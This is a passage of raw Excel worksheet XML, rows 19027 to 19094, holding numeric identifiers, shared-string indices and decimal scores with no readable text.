      <c r="D19027" s="2">
        <v>1.0</v>
      </c>
      <c r="E19027" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19027" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19028" ht="15.75" customHeight="1">
      <c r="A19028" s="1">
        <v>22894.0</v>
      </c>
      <c r="B19028" s="2">
        <v>4.7910479E7</v>
      </c>
      <c r="C19028" s="2" t="s">
        <v>18337</v>
      </c>
      <c r="D19028" s="2">
        <v>1.0</v>
      </c>
      <c r="E19028" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19028" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19029" ht="15.75" customHeight="1">
      <c r="A19029" s="1">
        <v>24031.0</v>
      </c>
      <c r="B19029" s="2">
        <v>9437984.0</v>
      </c>
      <c r="C19029" s="2" t="s">
        <v>18338</v>
      </c>
      <c r="D19029" s="2">
        <v>1.0</v>
      </c>
      <c r="E19029" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19029" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19030" ht="15.75" customHeight="1">
      <c r="A19030" s="1">
        <v>24396.0</v>
      </c>
      <c r="B19030" s="2">
        <v>1.078321E7</v>
      </c>
      <c r="C19030" s="2" t="s">
        <v>18339</v>
      </c>
      <c r="D19030" s="2">
        <v>1.0</v>
      </c>
      <c r="E19030" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19030" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19031" ht="15.75" customHeight="1">
      <c r="A19031" s="1">
        <v>24703.0</v>
      </c>
      <c r="B19031" s="2">
        <v>1.1657937E7</v>
      </c>
      <c r="C19031" s="2" t="s">
        <v>18340</v>
      </c>
      <c r="D19031" s="2">
        <v>1.0</v>
      </c>
      <c r="E19031" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19031" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19032" ht="15.75" customHeight="1">
      <c r="A19032" s="1">
        <v>25034.0</v>
      </c>
      <c r="B19032" s="2">
        <v>1.2829042E7</v>
      </c>
      <c r="C19032" s="2" t="s">
        <v>18329</v>
      </c>
      <c r="D19032" s="2">
        <v>1.0</v>
      </c>
      <c r="E19032" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19032" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19033" ht="15.75" customHeight="1">
      <c r="A19033" s="1">
        <v>25723.0</v>
      </c>
      <c r="B19033" s="2">
        <v>1.4541555E7</v>
      </c>
      <c r="C19033" s="2" t="s">
        <v>18341</v>
      </c>
      <c r="D19033" s="2">
        <v>1.0</v>
      </c>
      <c r="E19033" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19033" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19034" ht="15.75" customHeight="1">
      <c r="A19034" s="1">
        <v>26443.0</v>
      </c>
      <c r="B19034" s="2">
        <v>1.7268244E7</v>
      </c>
      <c r="C19034" s="2" t="s">
        <v>18342</v>
      </c>
      <c r="D19034" s="2">
        <v>1.0</v>
      </c>
      <c r="E19034" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19034" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19035" ht="15.75" customHeight="1">
      <c r="A19035" s="1">
        <v>26582.0</v>
      </c>
      <c r="B19035" s="2">
        <v>1.7943095E7</v>
      </c>
      <c r="C19035" s="2" t="s">
        <v>18343</v>
      </c>
      <c r="D19035" s="2">
        <v>1.0</v>
      </c>
      <c r="E19035" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19035" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19036" ht="15.75" customHeight="1">
      <c r="A19036" s="1">
        <v>26903.0</v>
      </c>
      <c r="B19036" s="2">
        <v>1.9315296E7</v>
      </c>
      <c r="C19036" s="2" t="s">
        <v>18333</v>
      </c>
      <c r="D19036" s="2">
        <v>1.0</v>
      </c>
      <c r="E19036" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19036" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19037" ht="15.75" customHeight="1">
      <c r="A19037" s="1">
        <v>27569.0</v>
      </c>
      <c r="B19037" s="2">
        <v>2.2427935E7</v>
      </c>
      <c r="C19037" s="2" t="s">
        <v>18344</v>
      </c>
      <c r="D19037" s="2">
        <v>1.0</v>
      </c>
      <c r="E19037" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19037" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19038" ht="15.75" customHeight="1">
      <c r="A19038" s="1">
        <v>28254.0</v>
      </c>
      <c r="B19038" s="2">
        <v>2.533397E7</v>
      </c>
      <c r="C19038" s="2" t="s">
        <v>18345</v>
      </c>
      <c r="D19038" s="2">
        <v>1.0</v>
      </c>
      <c r="E19038" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19038" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19039" ht="15.75" customHeight="1">
      <c r="A19039" s="1">
        <v>28580.0</v>
      </c>
      <c r="B19039" s="2">
        <v>2.6933153E7</v>
      </c>
      <c r="C19039" s="2" t="s">
        <v>18346</v>
      </c>
      <c r="D19039" s="2">
        <v>1.0</v>
      </c>
      <c r="E19039" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19039" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19040" ht="15.75" customHeight="1">
      <c r="A19040" s="1">
        <v>28825.0</v>
      </c>
      <c r="B19040" s="2">
        <v>2.8831342E7</v>
      </c>
      <c r="C19040" s="2" t="s">
        <v>18347</v>
      </c>
      <c r="D19040" s="2">
        <v>1.0</v>
      </c>
      <c r="E19040" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19040" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19041" ht="15.75" customHeight="1">
      <c r="A19041" s="1">
        <v>31368.0</v>
      </c>
      <c r="B19041" s="2">
        <v>4.9939772E7</v>
      </c>
      <c r="C19041" s="2" t="s">
        <v>18348</v>
      </c>
      <c r="D19041" s="2">
        <v>1.0</v>
      </c>
      <c r="E19041" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19041" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19042" ht="15.75" customHeight="1">
      <c r="A19042" s="1">
        <v>31579.0</v>
      </c>
      <c r="B19042" s="2">
        <v>5126925.0</v>
      </c>
      <c r="C19042" s="2" t="s">
        <v>18349</v>
      </c>
      <c r="D19042" s="2">
        <v>1.0</v>
      </c>
      <c r="E19042" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19042" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19043" ht="15.75" customHeight="1">
      <c r="A19043" s="1">
        <v>32481.0</v>
      </c>
      <c r="B19043" s="2">
        <v>5.6969356E7</v>
      </c>
      <c r="C19043" s="2" t="s">
        <v>18350</v>
      </c>
      <c r="D19043" s="2">
        <v>1.0</v>
      </c>
      <c r="E19043" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19043" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19044" ht="15.75" customHeight="1">
      <c r="A19044" s="1">
        <v>32770.0</v>
      </c>
      <c r="B19044" s="2">
        <v>6075795.0</v>
      </c>
      <c r="C19044" s="2" t="s">
        <v>18351</v>
      </c>
      <c r="D19044" s="2">
        <v>1.0</v>
      </c>
      <c r="E19044" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19044" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19045" ht="15.75" customHeight="1">
      <c r="A19045" s="1">
        <v>33141.0</v>
      </c>
      <c r="B19045" s="2">
        <v>7065764.0</v>
      </c>
      <c r="C19045" s="2" t="s">
        <v>18352</v>
      </c>
      <c r="D19045" s="2">
        <v>1.0</v>
      </c>
      <c r="E19045" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19045" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19046" ht="15.75" customHeight="1">
      <c r="A19046" s="1">
        <v>33559.0</v>
      </c>
      <c r="B19046" s="2">
        <v>8195524.0</v>
      </c>
      <c r="C19046" s="2" t="s">
        <v>18353</v>
      </c>
      <c r="D19046" s="2">
        <v>1.0</v>
      </c>
      <c r="E19046" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19046" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19047" ht="15.75" customHeight="1">
      <c r="A19047" s="1">
        <v>33691.0</v>
      </c>
      <c r="B19047" s="2">
        <v>8455700.0</v>
      </c>
      <c r="C19047" s="2" t="s">
        <v>18354</v>
      </c>
      <c r="D19047" s="2">
        <v>1.0</v>
      </c>
      <c r="E19047" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19047" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19048" ht="15.75" customHeight="1">
      <c r="A19048" s="1">
        <v>33748.0</v>
      </c>
      <c r="B19048" s="2">
        <v>8588893.0</v>
      </c>
      <c r="C19048" s="2" t="s">
        <v>18355</v>
      </c>
      <c r="D19048" s="2">
        <v>1.0</v>
      </c>
      <c r="E19048" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19048" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="19049" ht="15.75" customHeight="1">
      <c r="A19049" s="1">
        <v>1226.0</v>
      </c>
      <c r="B19049" s="2">
        <v>2.4966878E7</v>
      </c>
      <c r="C19049" s="2" t="s">
        <v>18356</v>
      </c>
      <c r="D19049" s="2">
        <v>1.0</v>
      </c>
      <c r="E19049" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19049" s="2">
        <v>0.09927140255009106</v>
      </c>
    </row>
    <row r="19050" ht="15.75" customHeight="1">
      <c r="A19050" s="1">
        <v>3427.0</v>
      </c>
      <c r="B19050" s="2">
        <v>3.8175184E7</v>
      </c>
      <c r="C19050" s="2" t="s">
        <v>18357</v>
      </c>
      <c r="D19050" s="2">
        <v>1.0</v>
      </c>
      <c r="E19050" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19050" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="19051" ht="15.75" customHeight="1">
      <c r="A19051" s="1">
        <v>13889.0</v>
      </c>
      <c r="B19051" s="2">
        <v>3.7019944E7</v>
      </c>
      <c r="C19051" s="2" t="s">
        <v>18358</v>
      </c>
      <c r="D19051" s="2">
        <v>1.0</v>
      </c>
      <c r="E19051" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19051" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="19052" ht="15.75" customHeight="1">
      <c r="A19052" s="1">
        <v>13913.0</v>
      </c>
      <c r="B19052" s="2">
        <v>3.7099265E7</v>
      </c>
      <c r="C19052" s="2" t="s">
        <v>18359</v>
      </c>
      <c r="D19052" s="2">
        <v>1.0</v>
      </c>
      <c r="E19052" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19052" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="19053" ht="15.75" customHeight="1">
      <c r="A19053" s="1">
        <v>14543.0</v>
      </c>
      <c r="B19053" s="2">
        <v>3.9911541E7</v>
      </c>
      <c r="C19053" s="2" t="s">
        <v>18360</v>
      </c>
      <c r="D19053" s="2">
        <v>1.0</v>
      </c>
      <c r="E19053" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19053" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="19054" ht="15.75" customHeight="1">
      <c r="A19054" s="1">
        <v>17773.0</v>
      </c>
      <c r="B19054" s="2">
        <v>5.0762783E7</v>
      </c>
      <c r="C19054" s="2" t="s">
        <v>18361</v>
      </c>
      <c r="D19054" s="2">
        <v>1.0</v>
      </c>
      <c r="E19054" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19054" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="19055" ht="15.75" customHeight="1">
      <c r="A19055" s="1">
        <v>18374.0</v>
      </c>
      <c r="B19055" s="2">
        <v>5.2577789E7</v>
      </c>
      <c r="C19055" s="2" t="s">
        <v>18362</v>
      </c>
      <c r="D19055" s="2">
        <v>1.0</v>
      </c>
      <c r="E19055" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19055" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="19056" ht="15.75" customHeight="1">
      <c r="A19056" s="1">
        <v>27494.0</v>
      </c>
      <c r="B19056" s="2">
        <v>2.2067601E7</v>
      </c>
      <c r="C19056" s="2" t="s">
        <v>18363</v>
      </c>
      <c r="D19056" s="2">
        <v>1.0</v>
      </c>
      <c r="E19056" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19056" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="19057" ht="15.75" customHeight="1">
      <c r="A19057" s="1">
        <v>31196.0</v>
      </c>
      <c r="B19057" s="2">
        <v>4921456.0</v>
      </c>
      <c r="C19057" s="2" t="s">
        <v>18364</v>
      </c>
      <c r="D19057" s="2">
        <v>1.0</v>
      </c>
      <c r="E19057" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19057" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="19058" ht="15.75" customHeight="1">
      <c r="A19058" s="1">
        <v>31372.0</v>
      </c>
      <c r="B19058" s="2">
        <v>4.9939772E7</v>
      </c>
      <c r="C19058" s="2" t="s">
        <v>18060</v>
      </c>
      <c r="D19058" s="2">
        <v>1.0</v>
      </c>
      <c r="E19058" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19058" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="19059" ht="15.75" customHeight="1">
      <c r="A19059" s="1">
        <v>2106.0</v>
      </c>
      <c r="B19059" s="2">
        <v>3.1306425E7</v>
      </c>
      <c r="C19059" s="2" t="s">
        <v>18365</v>
      </c>
      <c r="D19059" s="2">
        <v>1.0</v>
      </c>
      <c r="E19059" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19059" s="2">
        <v>0.09912854030501085</v>
      </c>
    </row>
    <row r="19060" ht="15.75" customHeight="1">
      <c r="A19060" s="1">
        <v>9887.0</v>
      </c>
      <c r="B19060" s="2">
        <v>5.675289E7</v>
      </c>
      <c r="C19060" s="2" t="s">
        <v>18366</v>
      </c>
      <c r="D19060" s="2">
        <v>1.0</v>
      </c>
      <c r="E19060" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19060" s="2">
        <v>0.09912854030501085</v>
      </c>
    </row>
    <row r="19061" ht="15.75" customHeight="1">
      <c r="A19061" s="1">
        <v>10438.0</v>
      </c>
      <c r="B19061" s="2">
        <v>1.0392279E7</v>
      </c>
      <c r="C19061" s="2" t="s">
        <v>18367</v>
      </c>
      <c r="D19061" s="2">
        <v>1.0</v>
      </c>
      <c r="E19061" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19061" s="2">
        <v>0.09912854030501085</v>
      </c>
    </row>
    <row r="19062" ht="15.75" customHeight="1">
      <c r="A19062" s="1">
        <v>22712.0</v>
      </c>
      <c r="B19062" s="2">
        <v>4.3235751E7</v>
      </c>
      <c r="C19062" s="2" t="s">
        <v>18368</v>
      </c>
      <c r="D19062" s="2">
        <v>1.0</v>
      </c>
      <c r="E19062" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19062" s="2">
        <v>0.09912854030501085</v>
      </c>
    </row>
    <row r="19063" ht="15.75" customHeight="1">
      <c r="A19063" s="1">
        <v>32170.0</v>
      </c>
      <c r="B19063" s="2">
        <v>5.4577909E7</v>
      </c>
      <c r="C19063" s="2" t="s">
        <v>18369</v>
      </c>
      <c r="D19063" s="2">
        <v>1.0</v>
      </c>
      <c r="E19063" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19063" s="2">
        <v>0.09912854030501085</v>
      </c>
    </row>
    <row r="19064" ht="15.75" customHeight="1">
      <c r="A19064" s="1">
        <v>5549.0</v>
      </c>
      <c r="B19064" s="2">
        <v>4.5943505E7</v>
      </c>
      <c r="C19064" s="2" t="s">
        <v>18370</v>
      </c>
      <c r="D19064" s="2">
        <v>1.0</v>
      </c>
      <c r="E19064" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19064" s="2">
        <v>0.09907407407407405</v>
      </c>
    </row>
    <row r="19065" ht="15.75" customHeight="1">
      <c r="A19065" s="1">
        <v>29798.0</v>
      </c>
      <c r="B19065" s="2">
        <v>3.5113688E7</v>
      </c>
      <c r="C19065" s="2" t="s">
        <v>18371</v>
      </c>
      <c r="D19065" s="2">
        <v>1.0</v>
      </c>
      <c r="E19065" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19065" s="2">
        <v>0.09887005649717513</v>
      </c>
    </row>
    <row r="19066" ht="15.75" customHeight="1">
      <c r="A19066" s="1">
        <v>3921.0</v>
      </c>
      <c r="B19066" s="2">
        <v>4.0557833E7</v>
      </c>
      <c r="C19066" s="2" t="s">
        <v>18372</v>
      </c>
      <c r="D19066" s="2">
        <v>1.0</v>
      </c>
      <c r="E19066" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19066" s="2">
        <v>0.09887005649717512</v>
      </c>
    </row>
    <row r="19067" ht="15.75" customHeight="1">
      <c r="A19067" s="1">
        <v>21708.0</v>
      </c>
      <c r="B19067" s="2">
        <v>2.536547E7</v>
      </c>
      <c r="C19067" s="2" t="s">
        <v>18373</v>
      </c>
      <c r="D19067" s="2">
        <v>1.0</v>
      </c>
      <c r="E19067" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19067" s="2">
        <v>0.09865900383141764</v>
      </c>
    </row>
    <row r="19068" ht="15.75" customHeight="1">
      <c r="A19068" s="1">
        <v>21389.0</v>
      </c>
      <c r="B19068" s="2">
        <v>2.174966E7</v>
      </c>
      <c r="C19068" s="2" t="s">
        <v>18374</v>
      </c>
      <c r="D19068" s="2">
        <v>1.0</v>
      </c>
      <c r="E19068" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19068" s="2">
        <v>0.09844054580896687</v>
      </c>
    </row>
    <row r="19069" ht="15.75" customHeight="1">
      <c r="A19069" s="1">
        <v>14142.0</v>
      </c>
      <c r="B19069" s="2">
        <v>3.7946322E7</v>
      </c>
      <c r="C19069" s="2" t="s">
        <v>18375</v>
      </c>
      <c r="D19069" s="2">
        <v>1.0</v>
      </c>
      <c r="E19069" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19069" s="2">
        <v>0.09821428571428571</v>
      </c>
    </row>
    <row r="19070" ht="15.75" customHeight="1">
      <c r="A19070" s="1">
        <v>27574.0</v>
      </c>
      <c r="B19070" s="2">
        <v>2.2447704E7</v>
      </c>
      <c r="C19070" s="2" t="s">
        <v>18376</v>
      </c>
      <c r="D19070" s="2">
        <v>1.0</v>
      </c>
      <c r="E19070" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19070" s="2">
        <v>0.0982142857142857</v>
      </c>
    </row>
    <row r="19071" ht="15.75" customHeight="1">
      <c r="A19071" s="1">
        <v>20469.0</v>
      </c>
      <c r="B19071" s="2">
        <v>1.2780158E7</v>
      </c>
      <c r="C19071" s="2" t="s">
        <v>18377</v>
      </c>
      <c r="D19071" s="2">
        <v>1.0</v>
      </c>
      <c r="E19071" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19071" s="2">
        <v>0.09797979797979797</v>
      </c>
    </row>
    <row r="19072" ht="15.75" customHeight="1">
      <c r="A19072" s="1">
        <v>1635.0</v>
      </c>
      <c r="B19072" s="2">
        <v>2.7998393E7</v>
      </c>
      <c r="C19072" s="2" t="s">
        <v>18378</v>
      </c>
      <c r="D19072" s="2">
        <v>1.0</v>
      </c>
      <c r="E19072" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19072" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="19073" ht="15.75" customHeight="1">
      <c r="A19073" s="1">
        <v>3231.0</v>
      </c>
      <c r="B19073" s="2">
        <v>3.734709E7</v>
      </c>
      <c r="C19073" s="2" t="s">
        <v>18379</v>
      </c>
      <c r="D19073" s="2">
        <v>1.0</v>
      </c>
      <c r="E19073" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19073" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="19074" ht="15.75" customHeight="1">
      <c r="A19074" s="1">
        <v>5645.0</v>
      </c>
      <c r="B19074" s="2">
        <v>4.6266937E7</v>
      </c>
      <c r="C19074" s="2" t="s">
        <v>18380</v>
      </c>
      <c r="D19074" s="2">
        <v>1.0</v>
      </c>
      <c r="E19074" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19074" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="19075" ht="15.75" customHeight="1">
      <c r="A19075" s="1">
        <v>9474.0</v>
      </c>
      <c r="B19075" s="2">
        <v>5.5869254E7</v>
      </c>
      <c r="C19075" s="2" t="s">
        <v>18381</v>
      </c>
      <c r="D19075" s="2">
        <v>1.0</v>
      </c>
      <c r="E19075" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19075" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="19076" ht="15.75" customHeight="1">
      <c r="A19076" s="1">
        <v>11505.0</v>
      </c>
      <c r="B19076" s="2">
        <v>2.2138528E7</v>
      </c>
      <c r="C19076" s="2" t="s">
        <v>18382</v>
      </c>
      <c r="D19076" s="2">
        <v>1.0</v>
      </c>
      <c r="E19076" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19076" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="19077" ht="15.75" customHeight="1">
      <c r="A19077" s="1">
        <v>17520.0</v>
      </c>
      <c r="B19077" s="2">
        <v>5.0076164E7</v>
      </c>
      <c r="C19077" s="2" t="s">
        <v>18383</v>
      </c>
      <c r="D19077" s="2">
        <v>1.0</v>
      </c>
      <c r="E19077" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19077" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="19078" ht="15.75" customHeight="1">
      <c r="A19078" s="1">
        <v>21120.0</v>
      </c>
      <c r="B19078" s="2">
        <v>1.8315149E7</v>
      </c>
      <c r="C19078" s="2" t="s">
        <v>18384</v>
      </c>
      <c r="D19078" s="2">
        <v>1.0</v>
      </c>
      <c r="E19078" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19078" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="19079" ht="15.75" customHeight="1">
      <c r="A19079" s="1">
        <v>6764.0</v>
      </c>
      <c r="B19079" s="2">
        <v>4.9419737E7</v>
      </c>
      <c r="C19079" s="2" t="s">
        <v>18385</v>
      </c>
      <c r="D19079" s="2">
        <v>1.0</v>
      </c>
      <c r="E19079" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19079" s="2">
        <v>0.09797979797979794</v>
      </c>
    </row>
    <row r="19080" ht="15.75" customHeight="1">
      <c r="A19080" s="1">
        <v>5146.0</v>
      </c>
      <c r="B19080" s="2">
        <v>4.4655091E7</v>
      </c>
      <c r="C19080" s="2" t="s">
        <v>18386</v>
      </c>
      <c r="D19080" s="2">
        <v>1.0</v>
      </c>
      <c r="E19080" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19080" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="19081" ht="15.75" customHeight="1">
      <c r="A19081" s="1">
        <v>5731.0</v>
      </c>
      <c r="B19081" s="2">
        <v>4.6611509E7</v>
      </c>
      <c r="C19081" s="2" t="s">
        <v>18387</v>
      </c>
      <c r="D19081" s="2">
        <v>1.0</v>
      </c>
      <c r="E19081" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19081" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="19082" ht="15.75" customHeight="1">
      <c r="A19082" s="1">
        <v>5924.0</v>
      </c>
      <c r="B19082" s="2">
        <v>4.722662E7</v>
      </c>
      <c r="C19082" s="2" t="s">
        <v>18388</v>
      </c>
      <c r="D19082" s="2">
        <v>1.0</v>
      </c>
      <c r="E19082" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19082" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="19083" ht="15.75" customHeight="1">
      <c r="A19083" s="1">
        <v>21838.0</v>
      </c>
      <c r="B19083" s="2">
        <v>2.7096196E7</v>
      </c>
      <c r="C19083" s="2" t="s">
        <v>18389</v>
      </c>
      <c r="D19083" s="2">
        <v>1.0</v>
      </c>
      <c r="E19083" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19083" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="19084" ht="15.75" customHeight="1">
      <c r="A19084" s="1">
        <v>24837.0</v>
      </c>
      <c r="B19084" s="2">
        <v>1.2171726E7</v>
      </c>
      <c r="C19084" s="2" t="s">
        <v>18390</v>
      </c>
      <c r="D19084" s="2">
        <v>1.0</v>
      </c>
      <c r="E19084" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19084" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="19085" ht="15.75" customHeight="1">
      <c r="A19085" s="1">
        <v>26979.0</v>
      </c>
      <c r="B19085" s="2">
        <v>1.9725924E7</v>
      </c>
      <c r="C19085" s="2" t="s">
        <v>18391</v>
      </c>
      <c r="D19085" s="2">
        <v>1.0</v>
      </c>
      <c r="E19085" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19085" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="19086" ht="15.75" customHeight="1">
      <c r="A19086" s="1">
        <v>31261.0</v>
      </c>
      <c r="B19086" s="2">
        <v>4942565.0</v>
      </c>
      <c r="C19086" s="2" t="s">
        <v>18392</v>
      </c>
      <c r="D19086" s="2">
        <v>1.0</v>
      </c>
      <c r="E19086" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19086" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="19087" ht="15.75" customHeight="1">
      <c r="A19087" s="1">
        <v>32479.0</v>
      </c>
      <c r="B19087" s="2">
        <v>5.6960727E7</v>
      </c>
      <c r="C19087" s="2" t="s">
        <v>18393</v>
      </c>
      <c r="D19087" s="2">
        <v>1.0</v>
      </c>
      <c r="E19087" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19087" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="19088" ht="15.75" customHeight="1">
      <c r="A19088" s="1">
        <v>13923.0</v>
      </c>
      <c r="B19088" s="2">
        <v>3.7099265E7</v>
      </c>
      <c r="C19088" s="2" t="s">
        <v>18394</v>
      </c>
      <c r="D19088" s="2">
        <v>1.0</v>
      </c>
      <c r="E19088" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19088" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="19089" ht="15.75" customHeight="1">
      <c r="A19089" s="1">
        <v>16862.0</v>
      </c>
      <c r="B19089" s="2">
        <v>4.7948337E7</v>
      </c>
      <c r="C19089" s="2" t="s">
        <v>18395</v>
      </c>
      <c r="D19089" s="2">
        <v>1.0</v>
      </c>
      <c r="E19089" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19089" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="19090" ht="15.75" customHeight="1">
      <c r="A19090" s="1">
        <v>792.0</v>
      </c>
      <c r="B19090" s="2">
        <v>2.1219791E7</v>
      </c>
      <c r="C19090" s="2" t="s">
        <v>18396</v>
      </c>
      <c r="D19090" s="2">
        <v>1.0</v>
      </c>
      <c r="E19090" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19090" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19091" ht="15.75" customHeight="1">
      <c r="A19091" s="1">
        <v>1953.0</v>
      </c>
      <c r="B19091" s="2">
        <v>3.028239E7</v>
      </c>
      <c r="C19091" s="2" t="s">
        <v>18397</v>
      </c>
      <c r="D19091" s="2">
        <v>1.0</v>
      </c>
      <c r="E19091" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19091" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19092" ht="15.75" customHeight="1">
      <c r="A19092" s="1">
        <v>2795.0</v>
      </c>
      <c r="B19092" s="2">
        <v>3.526017E7</v>
      </c>
      <c r="C19092" s="2" t="s">
        <v>18398</v>
      </c>
      <c r="D19092" s="2">
        <v>1.0</v>
      </c>
      <c r="E19092" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19092" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19093" ht="15.75" customHeight="1">
      <c r="A19093" s="1">
        <v>3145.0</v>
      </c>
      <c r="B19093" s="2">
        <v>3.6960931E7</v>
      </c>
      <c r="C19093" s="2" t="s">
        <v>18399</v>
      </c>
      <c r="D19093" s="2">
        <v>1.0</v>
      </c>
      <c r="E19093" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19093" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19094" ht="15.75" customHeight="1">
      <c r="A19094" s="1">
        <v>3189.0</v>
      </c>
      <c r="B19094" s="2">
        <v>3.7198648E7</v>
      </c>
      <c r="C19094" s="2" t="s">
        <v>18400</v>
      </c>
      <c r="D19094" s="2">
